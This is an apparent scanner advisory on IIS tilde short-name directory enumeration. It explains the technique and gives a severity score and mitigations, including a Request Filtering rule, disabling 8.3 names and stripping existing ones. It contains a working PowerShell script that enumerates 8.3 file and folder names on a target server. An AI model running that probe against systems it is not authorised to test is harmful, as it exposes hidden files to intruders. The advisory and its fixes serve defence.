Microsoft IIS directory enumeration


Kayran has detected the Microsoft IIS directory enumeration vulnerability.
By placing the tilde character (“~”) in a GET or OPTIONS request, an attacker can “guess” the short names and extensions of files and directories that have an 8.3 (DOS-style) equivalent on Windows hosts running Microsoft IIS. Every file or folder on an NTFS volume with 8.3 name creation enabled has such a short name, and IIS answers a request for an existing short name differently from one for a non-existent name, so the names can be enumerated character by character without ever knowing the full file names.

This is a problem especially for .NET-based websites that are vulnerable to direct URL access (also known as path aliasing).
An attacker could discover important files and folders that are not supposed to be accessible (or even visible) to everyone, and the recovered short names narrow the guessing needed to reach the full names.
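The probing described above, written out as an added PowerShell example (this is not Kayran's own check). It assumes the classic IIS behaviour that a request for `/<prefix>*~1*/.aspx` gets one status code when some short name beginning with `<prefix>` exists and a different one when none does (historically 404 versus 400, typically for GET on IIS 6 and for OPTIONS on IIS 7.x, hence the method parameter); the target URL, the character set, and the “impossible” baseline name are assumptions.

```powershell
# Added example, not part of the Kayran page: enumerate 8.3 short names on an
# IIS host via the tilde technique. Assumes IIS tells valid and invalid short
# names apart by status code, and that the URL is a host you are testing.
param(
    [Parameter(Mandatory)][string]$BaseUrl,                  # e.g. http://iis.example.test (assumed)
    [ValidateSet('GET', 'OPTIONS')][string]$Method = 'GET'  # GET or OPTIONS, as in the finding
)

# Characters that may appear in an 8.3 stem. IIS matches short names
# case-insensitively, so lower case is enough.
$Charset = [char[]]'abcdefghijklmnopqrstuvwxyz0123456789_-'

function Get-StatusCode {
    # Return the HTTP status code for a request. Invoke-WebRequest raises an
    # exception for 4xx/5xx on both Windows PowerShell and PowerShell 7; the
    # response object carrying the code is on the exception in both cases.
    param([string]$Url, [string]$Method)
    try {
        $r = Invoke-WebRequest -Uri $Url -Method $Method -UseBasicParsing -ErrorAction Stop
        return [int]$r.StatusCode
    } catch {
        if ($_.Exception.Response) { return [int]$_.Exception.Response.StatusCode }
        throw   # network failure rather than an HTTP answer
    }
}

function Find-ShortNames {
    # Depth-first walk over stems: if /ab*~1*/.aspx "exists", extend "ab" with
    # every charset character; if /ab~1*/.aspx "exists", the stem is exactly "ab".
    param([string]$Prefix, [int]$Exists)
    $hits = @()
    foreach ($c in $Charset) {
        $stem = "$Prefix$c"
        if ((Get-StatusCode "$BaseUrl/$stem*~1*/.aspx" $Method) -ne $Exists) { continue }
        if ((Get-StatusCode "$BaseUrl/$stem~1*/.aspx" $Method) -eq $Exists) { $hits += "$stem~1" }
        # A stem followed by "~1" is at most six characters long.
        if ($stem.Length -lt 6) { $hits += @(Find-ShortNames -Prefix $stem -Exists $Exists) }
    }
    return $hits
}

# Baseline: no 8.3 stem is longer than six characters before "~1", so a
# nine-character prefix can never match. Whatever the server returns here is
# its "no such short name" answer.
$Missing = Get-StatusCode "$BaseUrl/abcdefghi*~1*/.aspx" $Method
# "*~1*" matches any file or folder that has a short name at all.
$Exists  = Get-StatusCode "$BaseUrl/*~1*/.aspx" $Method

if ($Exists -eq $Missing) {
    Write-Output "Same status ($Exists) for existing and impossible short names: not enumerable this way."
    return
}
Write-Output "Enumerable: existing short name -> $Exists, none -> $Missing"
Find-ShortNames -Prefix '' -Exists $Exists
```

The comparison against the impossible nine-character prefix is what makes the check robust: instead of hard-coding 404 and 400, the script learns the server's two answers and only reports the host as enumerable when they differ. Only the `~1` suffix and no extensions are walked here; a full enumerator would also iterate `~2`, `~3`, … and the three-character extension in the same way.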


CVSS Version 3.x – 6.5 Medium


To prevent this vulnerability, make sure to discard all web requests whose URL contains the tilde character (“~”), for example with an IIS Request Filtering rule that denies the “~” URL sequence.
Also, add a registry value named:

Set the value to 1 to disable 8.3 name creation on the server. Note that this only stops new short names from being generated; files and folders that already have a short name keep it until those names are stripped from the volume.
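The two mitigations above, applied from PowerShell on the IIS server, as an added example (this is not Kayran's or Microsoft's code). The page leaves the registry value name blank; this example uses the documented NTFS setting NtfsDisable8dot3NameCreation under HKLM\SYSTEM\CurrentControlSet\Control\FileSystem, which is a fact not stated on the page. The site name and web root are assumptions, and the stripping and verification steps are added because disabling creation alone leaves existing short names in place.

```powershell
# Added example, not from the Kayran page: apply both mitigations on the IIS
# host itself. Run from an elevated PowerShell on the web server.
# Assumptions (not on the page): site 'Default Web Site', content under
# C:\inetpub\wwwroot, and the registry value NtfsDisable8dot3NameCreation.
#Requires -RunAsAdministrator
Import-Module WebAdministration

$SiteName = 'Default Web Site'      # assumption
$WebRoot  = 'C:\inetpub\wwwroot'    # assumption

# 1. Discard every request whose URL contains "~" via IIS Request Filtering.
#    Equivalent web.config fragment under <system.webServer>:
#    <security><requestFiltering><denyUrlSequences><add sequence="~" />
#    </denyUrlSequences></requestFiltering></security>
$filter  = 'system.webServer/security/requestFiltering/denyUrlSequences'
$present = Get-WebConfigurationProperty -PSPath "IIS:\Sites\$SiteName" -Filter $filter -Name 'Collection' |
    Where-Object { $_.sequence -eq '~' }
if (-not $present) {
    Add-WebConfigurationProperty -PSPath "IIS:\Sites\$SiteName" -Filter $filter -Name '.' -Value @{ sequence = '~' }
}

# 2. Stop NTFS from generating new 8.3 names (1 = disabled on all volumes).
$FsKey = 'HKLM:\SYSTEM\CurrentControlSet\Control\FileSystem'
Set-ItemProperty -Path $FsKey -Name 'NtfsDisable8dot3NameCreation' -Value 1 -Type DWord

# 3. Step 2 only prevents *new* short names; files already on disk keep theirs,
#    so strip them from the web root. /t is a test run that reports what would
#    change (and any registry entries referencing short names, which strip
#    refuses to break without /f); /s recurses into subdirectories.
fsutil 8dot3name strip /t /s $WebRoot
fsutil 8dot3name strip /s $WebRoot

# 4. Verify: the global setting, and that no short names remain. "dir /x"
#    prints the short name in the column before the long name; after a
#    successful strip that column is empty for every entry.
fsutil 8dot3name query
cmd /c dir /x $WebRoot
```

The request-filtering rule is the mitigation that protects the running site immediately, since IIS rejects the tilde request before it ever touches the file system; the registry value and the strip pass remove the short names themselves, so that a filtering bypass or a different front end has nothing left to enumerate.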

